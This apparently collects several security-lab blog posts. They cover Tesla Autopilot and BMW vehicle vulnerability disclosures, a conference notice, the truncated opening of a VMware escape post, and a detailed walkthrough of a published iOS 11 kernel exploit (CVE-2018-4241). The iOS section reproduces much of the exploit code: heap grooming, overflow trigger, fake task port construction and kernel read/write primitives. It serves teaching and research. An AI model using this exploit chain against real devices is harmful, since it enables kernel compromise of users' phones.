In later security research toward ADAS technologies, Keen Lab is focusing on areas like the AI model’s security of visual perception system, and architecture security of Autopilot system. Through deep experimental research on Tesla Autopilot, we acquired the following three achievements.

Research Findings

Auto-wipers Vision Recognition Flaw

Tesla Autopilot can identify the wet weather through image recognition technology, and then turn on the wipers if necessary. Based on our research, with an adversarial example craftily generated in the physical world, the system will be interfered and return an “improper” result, then turn on the wipers.

Lane Recognition Flaw

Tesla Autopilot recognizes lanes and assists control by identifying road traffic markings. Based on the research, we proved that by placing interference stickers on the road, the Autopilot system will capture these information and make an abnormal judgement, which causes the vehicle to enter into the reverse lane.

Control Steering System with a Gamepad

After compromised the Autopilot system on the Tesla Model S(ver 2018.6.1), Keen Lab further proved that we can control the steering system through the Autopilot system with a wireless gamepad, even when the Autopilot system is not activated by the driver.

Research Demonstration

Please find our research video below for the demonstration, or click here to see the video.

Technical Research Paper

For more technical details of our research, please refer the following link: Experimental Security Research of Tesla Autopilot.pdf

Feedback from Tesla

Tesla’s feedback on Autowipers:

“This research was demonstrated by displaying an image on a TV that was placed directly in front of the windshield of a car. This is not a real-world situation that drivers would face, nor is it a safety or security issue. Additionally, as we state in our Owners’Manual, the ‘Auto setting [for our windshield wipers] is currently in BETA.’ A customer can also elect to use the manual windshield wiper setting at any time.”

Tesla’s feedback on Lane Recognition:

“In this demonstration the researchers adjusted the physical environment (e.g. placing tape on the road or altering lane lines) around the vehicle to make the car behave differently when Autopilot is in use. This is not a real-world concern given that a driver can easily override Autopilot at any time by using the steering wheel or brakes and should be prepared to do so at all times.”

Tesla’s feedback for the “Control Steering System with a Gamepad” Research：

“The primary vulnerability addressed in this report was fixed by Tesla through a robust security update in 2017, followed by another comprehensive security update in 2018, both of which we released before this group reported this research to us. In the many years that we have had cars on the road, we have never seen a single customer ever affected by any of the research in this report.”

About Tencent Keen Security Lab

Tencent Keen Security Lab (in abbreviation “Keen Lab”) is a professional security research team, focusing on information security research of both attack and protection techniques, under Tencent Company. In the past years, Keen Lab built security research partnership with global manufactures in software, hardware, and internet industries, and achieved a lot of worldwide leading security research results.

Since the Year 2015, Keen Lab started research projects in IoT[3] and Connected Vehicle[4,5,6] categories and building partnership with manufacturers in IoT and car industries. In the Year 2016 and 2017, Keen Lab published the well-known research globally on “Tesla Model S and Model X Remote Hacking” with leveraging “Responsible Disclosure” practice to report the vulnerabilities and attack chains to Tesla.

[1] https://www.tesla.com/autopilot
[2] https://www.blackhat.com/us-18/briefings/schedule/#over-the-air-how-we-remotely-compromised-the-gateway-bcm-and-autopilot-ecus-of-tesla-cars-10806
[3] https://keenlab.tencent.com/zh/2017/04/01/remote-attack-on-mi-ninebot/
[4] https://keenlab.tencent.com/en/2016/09/19/Keen-Security-Lab-of-Tencent-Car-Hacking-Research-Remote-Attack-to-Tesla-Cars/
[5] https://keenlab.tencent.com/en/2017/07/27/New-Car-Hacking-Research-2017-Remote-Attack-Tesla-Motors-Again/
[6] https://keenlab.tencent.com/zh/2018/05/22/New-CarHacking-Research-by-KeenLab-Experimental-Security-Assessment-of-BMW-Cars/

Exploiting iOS 11.0-11.3.1 Multi-path-TCP:A walk through

2018-07-19T14:30:23.000Z

Introduction

The iOS 11 mptcp bug (CVE-2018-4241) discovered by Ian Beer is a serious kernel vulnerability which involves a buffer overflow in mptcp_usr_connectx that allows attackers to execute arbitrary code in a privileged context.

Ian Beer attached an interesting piece of PoC code which demonstrated a rather elegant technique to obtain the kernel task port with this vulnerability. Extending on his brief writeup that comes with the PoC, this blog post will mainly aim at walking through the PoC in great details as well as covering its background. If you are an iOS security researcher who hasn’t looked into the PoC source code yet, hopefully you will find the materials handy when you decide to do so.

Please have a copy of mptcp PoC code before we dive in! You can download it from here: Download

Note: All credits for exploitation techniques, vulnerability PoC code and original writeup belong to Ian Beer at Google Project Zero.

The Vulnerability

Let’s first take a quick look at the offending code in mptcp_usr_connect(), which is the handler for the connectx syscall for the AP_MULTIPATH socket family:

if (src) {
    // verify sa_len for AF_INET
if (src->sa_family == AF_INET &&
    src->sa_len != sizeof(mpte->__mpte_src_v4)) {
mptcplog((LOG_ERR, "%s IPv4 src len %u\n", __func__,
  src->sa_len),
 MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
error = EINVAL;
goto out;
}

    // verify sa_len for AF_INET6
if (src->sa_family == AF_INET6 &&
    src->sa_len != sizeof(mpte->__mpte_src_v6)) {
mptcplog((LOG_ERR, "%s IPv6 src len %u\n", __func__,
  src->sa_len),
 MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
error = EINVAL;
goto out;
}

    // code doesn't bail if sa_family is neither AF_INET nor AF_INET6
if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
memcpy(&mpte->mpte_src, src, src->sa_len);
}
}

The code does not validate the sa_len field if src→sa_family is neither AF_INET nor AF_INET6 so the function directly falls through to memcpy with a user specified sa_len value up to 255 bytes.

Background

Kernel zone heap allocator

To oversimplify a bit, kernel heap memory is divided into zones, and within one zone allocations are of the same size. For each zone, kernel keeps four doubly-linked lists to categorize a page’s memory availability, namely:

struct {
  queue_head_t any_free_foreign;  
  queue_head_t all_free;
  queue_head_t intermediate;
  queue_head_t all_used;
} pages;

When a memory allocation is requested, intermediate page list is traversed before all_free list, and a free memory block will be returned from the first available page.

Preallocated ipc_kmsg buffer

ipc_port has a struct ipc_kmsg *premsg member that points to an optional preallocated ipc_kmsg buffer. The intended use case is to allow user space to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers. In addition, this kernel heap buffer will not be freed after the message gets delivered to user space. Ian Beer uses this fact to increase the stability of the exploit.

Mach exception port

Mach provides an IPC-based exception-handling facility wherein exceptions are converted to messages. A thread or task can register one or multiple mach ports as so-called “exception port” to receive information about an exception. When an exception occurs, a message containing information about the exception is sent to the exception port. In this way, together with a mach port with preallocated ipc_kmsg buffer, we can force the kernel to send data to a deterministic location in the heap. Furthermore, we can also partially control the content of the message by manipulating the register state at the time of the exception, which will be dutifully carried over in the message by the kernel.

For more information about preallocated message and exception handling mechanism, readers are adviced to check out Ian Beer’s excellent writeup on the iOS 10 extra-recipe bug here, as well as Chapter 9.7 in Amit Singh’s seminal Mac OS X Internals.

Ok, let’s now dig in!

Finding the target

By passing in a src with an unexpected sa_family, we are now able to overflow inside mpte, a mptses structure, with sa_len bytes of attacker-controlled data. Here is the struct declaration in /bsd/netinet/mptcp_var.h:

struct mptses {
...

union {

struct sockaddrmpte_src;  // The field we are overflowing out of
struct sockaddr_in __mpte_src_v4;
struct sockaddr_in6 __mpte_src_v6;
};

union {

struct sockaddrmpte_dst;
struct sockaddr_in __mpte_dst_v4;
struct sockaddr_in6 __mpte_dst_v6;
};
  ...

#defineMPTE_ITFINFO_SIZE4
uint32_tmpte_itfinfo_size;
struct mpt_itf_info_mpte_itfinfo[MPTE_ITFINFO_SIZE];
struct mpt_itf_info*mpte_itfinfo;
  ...
};

Here, the mpte_itfinfo is particularly interesting because it’s a pointer… keep digging in references to mpte_itfinfo… oh snap!

1 2	if (mpte->mpte_itfinfo_size > MPTE_ITFINFO_SIZE) _FREE(mpte->mpte_itfinfo, M_TEMP);

In mptcp_session_destroy, the address pointed to by mpte_itfinfo is freed, and mpte_itfinfo_size is under our complete control too! Moreover, we don’t need to know a priori the size of the object we would like to _FREE, because kfree_addr() will look up the size from the memory zone struct in which the object resides. (_FREE is just a macro around kfree_addr().)

This is just too good to be true.

Set up the heap

To turn this overflow into something actually useful, it’s time for some heap Feng Shui. The end goal here is to have an ipc_kmsg and a pipe buffer overlapping with each other so that we can write to and read from it. In the PoC, Ian Beer chooses to overwrite the lower 3 bytes of mpte_itfinfo with 0x000000, after which it will point to a 16MB aligned page boundary.

In order to have an ipc_kmsg sitting right at that 16MB boundary, the code alternatingly allocates 16MB of ipc_kmsg and a bunch of mptcp sockets in the kernel heap. The former is done by allocating fake mach ports and sending mach messages of calculated size to the port, during which mach_msg(...MACH_SEND_MSG...) will allocate kernel heap buffer for us and copyin the message from user space. This technique allows us to effectively do the same thing as kalloc but from outside the kernel. We are also able to control the memory zone for the ipc_kmsg, since all it takes is just to work backward, calculate the msgh_size based on the kalloc size we would like to achieve. In the PoC, Ian Beer chose to place ipc_kmsgs in kalloc.2048 zone.

// a few times do:
  // alloc 16MB of messages
  // alloc a hundred sockets
  printf("trying to force a 16MB aligned 0x800 kalloc on to freelist\n");
  for (int i = 0; i < 7; i++) {
    printf("%d/6...\n", i);
    for (int j = 0; j < 0x2000; j++) {
      mach_port_t p = fake_kalloc(0x800); // kalloc.2048 zone block size
    }
    for (int j = 0; j < 100; j++) {
      int sock = alloc_mptcp_socket();
      
      // we'll keep two of them:
      if (i == 6 && (j==94 || j==95)) {
        target_socks[next_sock] = sock;
        next_sock++;
        next_sock %= (sizeof(target_socks)/sizeof(target_socks[0]));
      } else {
        sockets[next_all_sock++] = sock;
      }
    }
  }

Trigger the bug

The code in do_partial_kfree_with_socket triggers the bug, overwriting the lower 3 bytes of *mpte_itfinfo with NULL bytes and let’s hope now it somewhat looks like the diagram shown below. Fingers crossed! 🤞

void do_partial_kfree_with_socket(int fd, uint64_t kaddr, uint32_t n_bytes) {
  struct sockaddr* sockaddr_src = malloc(256);
  memset(sockaddr_src, 'D', 256);
  *(uint64_t*) (((uint8_t*)sockaddr_src)+koffset(KFREE_ADDR_OFFSET)) = kaddr;
  sockaddr_src->sa_len = koffset(KFREE_ADDR_OFFSET)+n_bytes;
  sockaddr_src->sa_family = 'B'; // An abnormal sa_family 
  
  struct sockaddr* sockaddr_dst = malloc(256);
  memset(sockaddr_dst, 'C', 256);
  sockaddr_dst->sa_len = sizeof(struct sockaddr_in6);
  sockaddr_dst->sa_family = AF_INET6;
  
  sa_endpoints_t eps = {0};
  eps.sae_srcif = 0;
  eps.sae_srcaddr = sockaddr_src;
  eps.sae_srcaddrlen = koffset(KFREE_ADDR_OFFSET)+n_bytes;
  eps.sae_dstaddr = sockaddr_dst;
  eps.sae_dstaddrlen = sizeof(struct sockaddr_in6);
  
  printf("doing partial overwrite with target value: %016llx, length %d\n", kaddr, n_bytes);
  
  int err = connectx(
                     fd,
                     &eps,
                     SAE_ASSOCID_ANY,
                     0,
                     NULL,
                     0,
                     NULL,
                     NULL);

  
  printf("err: %d\n", err);
  
  close(fd); // Trigger the _FREE, but need to wait for mptcp_gc
  
  
  return;
}

After we point mpte_itfinfo to the 16MB boundary, we can trigger the _FREE by just close the socket.

One caveat is that we need to wait for mptcp_gc because mpte_itfinfo is not instantaneously _FREE‘ed after socket is closed, as evident by the comments of this function in /xnu-4570.41.2/bsd/netinet/mptcp_subr.c:

/*
 * MPTCP garbage collector.
 *
 * This routine is called by the MP domain on-demand, periodic callout,
 * which is triggered when a MPTCP socket is closed.  The callout will
 * repeat as long as this routine returns a non-zero value.
 */
static uint32_t
mptcp_gc(struct mppcbinfo *mppi)
{
...
    mptcp_session_destroy(mpte); // mpte_itfinfo is _FREE'ed here
...
    return (active)
}

printf("waiting for second mptcp gc...\n");
  // wait for the mptcp gc...
  for (int i = 0; i < 400; i++) {
    usleep(10000);
}

After _FREE, hopefully now one of the ipc_kmsg is freed and the page put on the Intermidiate list.

Allocate pipes

Next, we allocate a bunch of pipes and write to its write end 2047 bytes of data. The backing buffers for these pipes will come from kalloc.2048, hopefully including our 16MB-aligned address:

Trigger the bug again

Trigger the bug a second time, _FREE the underlying pipe buffer and put the page on Intermediate page list again.

After overflow:

After _FREE:

Allocate more mach ports!

Next, we allocate a bunch of mach ports with preallocated ipc_kmsg buffers from kalloc.2048 zone using mach_port_allocate_full() and pass in the size as a member of the mach_port_qos_t parameter. The desired size for the preallocated buffer is 2048 bytes in order to place it in kalloc.2048 zone, hopefully one of them picks up the space we just _FREE ‘ed.

We then insert a SEND RIGHT to every mach port we allocated in this step, as each one will be registered as another thread’s exception port later.

Catching the pipe

As shown on the diagram above, ideally now we have an ipc_kmsg (which we can get messages sent to and then receive) and a pipe buffer (which we can read and write) overlapping each other.

We now need to find out which one of the hundreds of pipes we allocated a while ago is on that spot.

int find_replacer_pipe(void** contents) {
  uint64_t* read_back = malloc(PIPE_SIZE);
  for (int i = 0; i < next_read_fd; i++) {
    int fd = read_fds[i];
    ssize_t amount = read(fd, read_back, PIPE_SIZE);
    if (amount != PIPE_SIZE) {
      printf("short read (%ld)\n", amount);
    } else {
      printf("full read\n");
    }
    
    int pipe_is_replacer = 0;
    for (int j = 0; j < PIPE_SIZE/8; j++) {
      if (read_back[j] != 0x4242424242424242) { // Is the content still "BBBBBBBB"?
        pipe_is_replacer = 1;
        printf("found an unexpected value: %016llx\n", read_back[j]);
      }
    }
    
    if (pipe_is_replacer) {
      *contents = read_back;
      return fd;
    }
  }
  return -1;
}

The technique Ian Beer used here is just to read from each pipe, and compare the content read with the original data we piped into the buffer, BBBBBBBBB (0x4242424242 in hex). If different, that means the underlying buffer has been overwritten by a newly allocated ipc_kmsg.

If we can’t find a pipe satisfying this condition it simply means there is no overlapping, and we just have to restart and wish ourselves better luck next time.

Catching the port

Now, we need to figure out which port owns the preallocated ipc_kmsg buffer. To do that, we need to somehow persuade the kernel into overwriting prealloced kmsg with something different so that we can compare the content again and spot the difference.

Ian Beer’s technique in the PoC is to register each port as an exception port for a thread and intentionally raise an exception on the thread, causing the kernel to send a kmsg to the buffer, then immediately compares the content by reading from the pipe. This is ingenious.

for (int i = 0; i < 100; i++) {    send_prealloc_msg(exception_ports[i]);    // read from the pipe and see if the contents changed:

Let’s walk through send_prealloc_msg() step by step.

1. Start a thread

pthread_create(&t, NULL, do_thread, (void*)port);

2. Register exception port

void* do_thread(void* arg) {
  mach_port_t exception_port = (mach_port_t)arg;
  
  kern_return_t err;
  err = thread_set_exception_ports(
                                   mach_thread_self(),
                                   EXC_MASK_ALL,
                                   exception_port,
                                   EXCEPTION_STATE_IDENTITY, // catch_exception_raise_state_identity messages
                                   ARM_THREAD_STATE64);

3. Substitute thread port with a host port

1 2	// make the thread port which gets sent in the message actually be the host port err = thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, mach_host_self());

4. Crash the thread

// cause an exception message to be sent by the kernel
  volatile char* bAAAAd_ptr = (volatile char*)0x41414141;
  *bAAAAd_ptr = 'A';
// Now the thread is crashed

After the thread crashes, a message containing the exception information is sent to our ipc_kmsg buffer, waiting to be received and processed by the port. We can now read from the pipe and compare the content.

ssize_t amount = read(replacer_pipe, new_contents, PIPE_SIZE);
    if (amount != PIPE_SIZE) {
      printf("short read (%ld)\n", amount);
    }
    if (memcmp(original_contents, new_contents, PIPE_SIZE) == 0) {
      // they are still the same, this isn't the correct port:
      ...
    } else {
      // different! we found the right exception port which has its prealloced port overlapping
      replacer_port = exception_ports[i];

      break;
    }
  }

At this point, we have fully discovered the overlapping pipe, port pair.

We also need to save the kernel address for the host port and our task port for later:

// We will get kernel ipc_space address from this later
uint64_t host_port_kaddr = *((uint64_t*)(new_contents + 0x66c));

// Need this for cleaning up mach port table
uint64_t task_port_kaddr = *((uint64_t*)(new_contents + 0x67c));

Build fake task port

Before we receive the exception message into user space, we want to build a fake task port to allow early kernel arbitray read.

build_fake_task_port(original_contents+fake_port_offset, fake_port_kaddr, early_read_pipe_buffer_kaddr, 0, 0);

We can do this by mimicking the structure of a proper task port:

#define IO_BITS_ACTIVE 0x80000000
#define IKOT_TASK 2
#define IKOT_NONE 0

void build_fake_task_port(uint8_t* fake_port, uint64_t fake_port_kaddr, uint64_t initial_read_addr, uint64_t vm_map, uint64_t receiver) {
  // clear the region we'll use:
  memset(fake_port, 0, 0x500);
  
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)) = IO_BITS_ACTIVE | IKOT_TASK;
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES)) = 0xf00d; // leak references
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS)) = 0xf00d; // leak srights
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)) = receiver;
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)) = 0x123456789abcdef;
  
  
  uint64_t fake_task_kaddr = fake_port_kaddr + 0x100;
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)) = fake_task_kaddr;
  
  ...
}

and shoving it into our ipc_kmsg buffer with our replacer_pipe.

// the thread port is at +66ch
  // we could parse the kmsg properly, but this'll do...
  // replace the thread port pointer with one to our fake port:
  *((uint64_t*)(original_contents+0x66c)) = fake_port_kaddr;
  
  // replace the ipc_kmsg:
  write(pipe_write_end, original_contents, PIPE_SIZE);

We can read off the kernel address of our buffer from the next field, which points back to the buffer itself given it is the only ipc_kmsg in the queue.

1	uint64_t pipe_buf = ((uint64_t)(new_contents + 0x8));

Let’s zoom into our ipc_kmsg buffer to observe the change.

Now, the thread_port points to our fake task port! Mission accomplished!

Note: Here, in this particular PoC, *thread_port actually points to a host port because in Step 3 of the previous section, we substitute the thread port with host port. By doing this, we have a leaked host port kernel address, which can be used to obtain kernel’s ipc_space later. We will cover this shortly.

Receive the exception message

User space programs can receive the exception message by a callout to system exception server, exc_server, after which various port rights in the ipc_kmsg will be inserted into calling task’s ipc_space, including our fake task port’s send right (which is really supposed to be a thread port).

We can now simply extract the port name to the fake port from the exception handler callback, from the thread argument:

kern_return_t catch_exception_raise_state_identity
(
 mach_port_t exception_port,
 mach_port_t thread,
 mach_port_t task,
 exception_type_t exception,
 exception_data_t code,
 mach_msg_type_number_t codeCnt,
 int *flavor,
 thread_state_t old_state,
 mach_msg_type_number_t old_stateCnt,
 thread_state_t new_state,
 mach_msg_type_number_t *new_stateCnt
 )
{
  printf("catch_exception_raise_state_identity\n");
  
    
    
  // the thread port isn't actually the thread port
  // we rewrote it via the pipe to be the fake kernel r/w port
  printf("thread: %x\n", thread);
  extracted_thread_port = thread;
  
  mach_port_deallocate(mach_task_self(), task);
  
  // make the thread exit cleanly when it resumes:
  memcpy(new_state, old_state, sizeof(_STRUCT_ARM_THREAD_STATE64));
  _STRUCT_ARM_THREAD_STATE64* new = (_STRUCT_ARM_THREAD_STATE64*)(new_state);
  
  *new_stateCnt = old_stateCnt;
  
  new->__pc = (uint64_t)pthread_exit;
  new->__x[0] = 0;
  
  // let the thread resume and exit
  return KERN_SUCCESS;
}

At this point, we have successfully inserted a fake task port into our task’s ipc_space. Isn’t this ingenious?

Build early kernel read primitive

With the fake task port we can build an early kernel read primitive by using pid_for_task().

Given a valid task port, pid_for_task() simply get a task pointer from port’s ip_kobject, deference and retrieve the proc pointer from task’s bsd_info , dereference again the proc struct and get the pid from it. Since all it does is just some pointer arithmetic and dereferencing, we can just create a fake task struct inside the ipc_kmsg we control, work backward and place the kernel address we would like to read at the correct offset.

uint8_t* fake_task = fake_port + 0x100;

// set the bsd_info pointer to be 0x10 bytes before the desired initial read:
*(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)) = initial_read_addr - 0x10;

With every call to early_rk32, we just need to rebuild the task port, fixing the bsd_info pointer address accordingly:

Here, unsurprisingly, 0x10 is just the offset of the p_pid field inside struct proc, as evident in proc_internal.h:

structproc {
LIST_ENTRY(proc) p_list;// Just two pointers, so size 0x10

pid_tp_pid;// Offset 0x10
void * task;
...
}

The drawback of this technique is that the read is limited to 32 bits, which is the size of a pid_t.

Build full kernel read/write primitive

Notice that the struct ipc_space *receiver field in our fake port and an address space description, vm_map_t map, in our fake task is still missing. We can achieve full kernel read/write by filling in the address for ipc_space_kernel and kernel task’s vm_map.

We can get the kernel ipc_space from the host port we obtained a while ago, with a known offset:

1 2	// receiver field uint64_t ipc_space_kernel = early_rk64(host_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));

However, kernel’s vm_map is a bit trickier to get.

Ian Beer’s approach takes the following steps:

Find the kernel task port on the heap
Get kernel’s task from task port
Get the vm_map form kernel task

To find the kernel task port on the heap, we search in the vicinity of the host port for anything that looks like a task port and get the kernel task vm_map from it:

// now look through up to 0x4000 of ports and find one which looks like a task port:
  for (int i = 0; i < (0x4000/0xa8); i++) {
    uint64_t early_port_kaddr = first_port + (i*0xa8);
    uint32_t io_bits = early_rk32(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS));
    
    if (io_bits != (IO_BITS_ACTIVE | IKOT_TASK)) {
      continue;
    }
    
    // get that port's kobject:
    uint64_t task_t = early_rk64(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
    if (task_t == 0) {
      printf("weird heap object with NULL kobject\n");
      continue;
    }
    
    // check the pid via the bsd_info:
    uint64_t bsd_info = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
    if (bsd_info == 0) {
      printf("task doesn't have a bsd info\n");
      continue;
    }
    uint32_t pid = early_rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID));
    if (pid != 0) {
      printf("task isn't the kernel task\n");
    }
    
    // found the right task, get the vm_map
    kernel_vm_map = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_VM_MAP));
    break;
  }
  
  if (kernel_vm_map == 0) {
    printf("unable to find the kernel task map\n");
    return;
  }

printf("kernel map:%016llx\n", kernel_vm_map);

After insert what we just found into our fake port and fake task, we now finally get a fully functional, but “fake”, tfp0. Hooray!

Have fun now with your freshly baked tfp0!

Reference

XNU kernel heap overflow due to bad bounds checking in MPTCP, Ian Beer
Exception-based exploitation on iOS, Ian Beer
CVE-2018-4241, Common Vulnerabilities and Exposures
Mac OS X Internals - A System Approach, Amit Singh
*OS Internals: Volume III security & Insecurity, Jonathan Levin

New Vehicle Security Research by KeenLab: Experimental Security Assessment of BMW Cars

2018-05-22T07:46:12.000Z

Introduction

The research of BMW cars is an ethical hacking research project. In the research, Keen Security Lab performed an in-depth and comprehensive analysis of both hardware and software on in-vehicle infotainment Head Unit, Telematics Control Unit and Central Gateway Module of multiple BMW vehicles. Through mainly focusing on various external attack surfaces, (including GSM network, BMW Remote Service, BMW ConnectedDrive System, Remote Diagnosis, NGTP protocol, Bluetooth protocol, USB and OBD-II interfaces), Keen Security Lab has gained local and remote access to infotainment components, T-Box components and UDS communication above certain speed of selected multiple BMW vehicle modules and been able to gain control of the CAN buses with the execution of arbitrary, unauthorized diagnostic requests of BMW in-car systems remotely.

Vulnerability Findings

After conducting the intensive security analysis of multiple BMW cars’ electronic control units, Keen Security Lab has found 14 vulnerabilities with local and remote access vectors in BMW connected cars. And 7 of these vulnerabilities were assigned CVE (Common Vulnerabilities and Exposures) numbers.
All the following vulnerabilities and CVEs have been confirmed by BMW after we submitted the full report and collaborated with them on technical details:

Attack Chains

In our research, we have already found some ways to influence the vehicle via different kinds of attack chains by sending arbitrary diagnostic messages to electronic control units. Since we were able to gain access to the head unit and telematics control unit, these attack chains are aimed to implement an arbitrary diagnostic message transmission through Central Gateway Module in order to impact or control electronic control units on different CAN buses (e.g. PT-CAN, K-CAN, etc..).

Vulnerable BMW Models

In our research, the vulnerabilities we found mainly exist in the Head Unit, Telematics Control Unit (TCB), and Central Gateway Module. Based on our research experiments, we can confirm that the vulnerabilities existed in Head Unit would affect several BMW models, including BMW i Series, BMW X Series, BMW 3 Series, BMW 5 Series, BMW 7 Series. And the vulnerabilities existed in Telematics Control Unit (TCB) would affect the BMW models which equipped with this module produced from year 2012.
Table below lists the vulnerable BMW models we’ve tested during our research and each with its firmware versions of the specific components.

As different BMW car models may be equipped with different components, and even the same component may have different firmware versions during the product lifecycle. So that from our side the scope of the vulnerable car models is hard to be precisely confirmed. Theoretically, BMW models which are equipped with these vulnerable components could be compromised from our perspective if the corrective measures had not already been effectively implemented by BMW.

BMW confirmed, that the found vulnerabilities are present in the infotainment and T-Box components mentioned above. Updates have already been developed and implemented by BMW (see below).

Disclosure Timeline

The research to BMW cars is an ethical hacking research project. Keen Lab follows the “Responsible Disclosure” practice, which is a well-recognized practice by global manufactures in software and internet industries, to work with BMW on fixing the vulnerabilities and attack chains listed in this report.

Below is the detailed disclosure timeline.

January 2017: Keen Lab kicked off the BMW security research project internally.
February 2018: Keen Lab proved all the vulnerability findings and attack chains in an experimental environment.
February 25, 2018: Keen Lab reported all the research findings to BMW.
March 9, 2018: BMW fully confirmed all the vulnerabilities reported by Keen Lab.
March 22, 2018: BMW provided the planned technical mitigation measures for the vulnerabilities reported by Keen Lab.
April 5, 2018: CVE numbers related to the vulnerabilities have been reserved. (CVE-2018-9322, CVE-2018-9320, CVE-2018-9312, CVE-2018-9313, CVE-2018-9314, CVE-2018-9311, CVE-2018-9318)
May 22, 2018: This summary report is released to public.
Early 2019: Keen Lab will release the full technical paper.
BMW informed Keen Security Lab that, for all the attacks via cellular networks BMW has started implementing measures in March 2018. These measures are in rollout since mid of April 2018 and are distributed via configuration updates remotely to the affected vehicles. Additional security enhancements are developed by BMW in form of optional SW updates. These will be available through the BMW dealer network.

Press Release from BMW Group

The BMW Group is convinced that the presented study constitutes the by far most comprehensive and complex testing ever conducted on BMW Group vehicles by a third party. For this outstanding research work, Tencent Keen Security Lab has been selected as the first winner of the BMW Group Digitalization and IT Research Award.

https://www.press.bmwgroup.com/global/article/detail/T0281245EN

Research Summary Report

Please refer the following link to know more about our research:
Experimental Security Assessment of BMW Cars by KeenLab.pdf

Joint Video

About Tencent Keen Security Lab

Tencent Keen Security Lab[1] (in abbreviation “Keen Lab”) is a professional security research team, focusing on information security research of both attack and protection techniques, under Tencent Company. In the past years, Keen Lab built security research partnership with global manufactures in software, hardware and internet industries, and achieved a lot of worldwide leading security research results.

Since Year 2015, Keen Lab started research projects in IoT[2] and Connected Vehicle categories and building partnership with manufactures in IoT and car industries. In the Year 2016 and 2017, Keen Lab published the well-known research globally on “Tesla Model S and Model X Remote Hacking” with leveraging “Responsible Disclosure” practice to report the vulnerabilities and attack chains to Tesla[3,4].

[1] https://keenlab.tencent.com/

[2] https://keenlab.tencent.com/zh/2017/04/01/remote-attack-on-mi-ninebot/

[3] https://keenlab.tencent.com/en/2016/09/19/Keen-Security-Lab-of-Tencent-Car-Hacking-Research-Remote-Attack-to-Tesla-Cars/

[4] https://keenlab.tencent.com/en/2017/07/27/New-Car-Hacking-Research-2017-Remote-Attack-Tesla-Motors-Again/

TenSec 2018

2018-05-10T13:58:46.000Z

TenSec 2018 will be held on October 10 and 11, with the most heated debate in the cybersecurity area, the most famous technology corporations, car manufacturers and security communities of leading experts from all over the world. The summit focuses on Big Data, Artificial Intelligence, Mobile Internet, Cloud Computing, Internet of Things, Block Chain, Virtualization, Intelligent Connected Vehicle and research tools in the security field, and encourages the sharing of the forefront of the international first-class security technologies and research achievements. We look forward to create a platform to discuss the security technology innovation and the development trend in the future for all the experts in the security community.

Since its launch in 2016, TenSec has been committed to exploring international frontier security technologies and research, building a long-term and sustainable communication and cooperation platform for international manufacturers and security communities to safeguard emerging Internet forms and user security.

A bunch of Red Pills: VMware Escapes

2018-04-23T12:51:03.000Z

Background

VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for cloud, and VMware Workstation and Fusion for Desktops (Windows, Linux, macOS).
The technology is very well known to the public: it allows users to run unmodified guest “virtual machines”.
Often those virtual machines are not trusted, and they must be isolated.
VMware goes to a great deal to offer this isolation, especially on the ESXi product where virtual machines of different actors can potentially run on the same hardware. So a strong isolation of is paramount importance.

Recently at Pwn2Own the “Virtualization” category was introduced, and VMware was among the targets since Pwn2Own 2016.

In 2017 we successfully demonstrated a VMware escape from a guest to the host from a unprivileged account, resulting in executing code on the host, breaking out of the virtual machine.

If you escape your virtual machine environment then all isolation assurances are lost, since you are running code on the host, which controls the guests.

But how VMware works?

In a nutshell it often uses (but they are not strictly required) CPU and memory hardware virtualization technologies, so a guest virtual machine can run code at native speed most of the time.

But a modern system is not just a CPU and Memory, it also requires lot of other Hardware to work properly and be useful.

This point is very important because it will consist of one of the biggest attack surfaces of VMware: the virtualized hardware.

Virtualizing a hardware device is not a trivial task. It’s easily realized by reading any datasheet for hardware software interface for a PC hardware device.

VMware will trap on I/O access on this virtual device and it needs to emulate all those low level operations correctly, since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts.

Furthermore if you ever used VMware you might have noticed its copy paste capabilities, and shared folders. How those are implemented?

To summarize, in this blog post we will cover quite some bugs. Both in this “backdoor” functionalities that support those “extra” services such as C&P, and one in a virtualized device.

Altough recently lot of VMware blogpost and presentations were released, we felt the need to write our own for the following reasons:

First, no one ever talked correctly about our Pwn2Own bugs, so we want to shed light on them.
Second, some of those published resources either lack of details or code.

So we hope you will enjoy our blogpost!

We will begin with some background informations to get you up to speed.

Let’s get started!

Overall architecture

A complex product like VMware consists of several components, we will just highlight the most important ones, since the VMware architecture design has already been discussed extensively elsewhere.

VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs tick and run and also handles all the tasks which are impossible to perform from the host ring 3 for example.
vmnat: vmnat is responsible for the network packet handling, since VMware offers advanced functionalities such as NAT and virtual networks.
vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles lot of tasks which are relevant for this blogpost, including lot of the device emulation, and backdoor requests handling. The result of the exploitation of the chains we will present will result in code execution on the host in the context of vmware-vmx.

Backdoor

The so called backdoor, it’s not actually a “backdoor”, it’s simply a mechanism implemented in VMware for guest-host and host-guest communication.

A useful resource for understanding this interface is the open-vm-tools repository by VMware itself.

